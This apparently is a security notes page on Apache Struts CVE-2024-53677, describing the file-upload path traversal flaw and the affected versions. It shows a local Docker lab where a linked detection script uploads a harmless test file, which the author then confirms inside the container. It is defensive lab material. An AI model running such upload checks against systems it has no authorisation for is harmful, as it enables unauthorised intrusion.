Struts - CVE-2024-53677 / S2-067
Last updated
Was this helpful?
Last updated
Was this helpful?
Was this helpful?
File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.
Vulnerable versions:
Struts 2.0.0 - Struts 2.3.37 (End-of-Life),
Struts 2.5.0 - Struts 2.5.33, and
Struts 6.0.0 - Struts 6.3.0.2
Check script from: https://github.com/TAM-K592/CVE-2024-53677-S2-067/tree/ALOK
» curl http://127.0.0.1:8081/vuln_test.txt
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/vuln_test.txt] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.98</h3></body></html>
» python3 check.py -u http://127.0.0.1:8081 --upload_endpoint /upload.action
2025-01-07 12:21:20,822 [INFO] Starting detection process...
2025-01-07 12:21:20,822 [INFO] Starting detection for CVE-2024-53677 (S2-067)...
2025-01-07 12:21:20,823 [INFO] Sending test request to upload endpoint: http://127.0.0.1:8081/upload.action
2025-01-07 12:21:20,838 [INFO] [INFO] File upload request succeeded.
2025-01-07 12:21:20,838 [WARNING] [ALERT] File name overwrite detected. Target may be vulnerable!
2025-01-07 12:21:20,838 [INFO] Detection process completed.
» curl http://127.0.0.1:8081/vuln_test.txt
CVE-2024-53677 / S2-067 detection test.
» sudo docker exec -it struts-6.3.0.1 bash
root@b991eecb47b4:/usr/local/tomcat# cd webapps/ROOT
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# ls -al
total 28
drwxr-x--- 5 root root 4096 Jan 7 11:23 .
drwxr-xr-x 1 root root 4096 Jan 7 11:18 ..
drwxr-x--- 2 root root 4096 Jan 7 11:14 forbidden
-rw-r----- 1 root root 226 Jan 7 09:41 index.html
drwxr-x--- 3 root root 4096 Jan 7 11:14 META-INF
-rw-r----- 1 root root 39 Jan 7 11:23 vuln_test.txt
drwxr-x--- 4 root root 4096 Jan 7 11:14 WEB-INF
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# cat vuln_test.txt
CVE-2024-53677 / S2-067 detection test.
» git clone git@github.com:0xPThree/struts_cve-2024-53677.git
» cd struts_cve-2024-53677
» sudo docker build --ulimit nofile=122880:122880 -m 3G -t struts-6.3.0.1 .
»
» curl http://127.0.0.1:8081/upload.action
<html>
<head>
<title>File upload</title>
</head>
<body>
<h1>Apache Struts 6.3.0.1</h1>
<p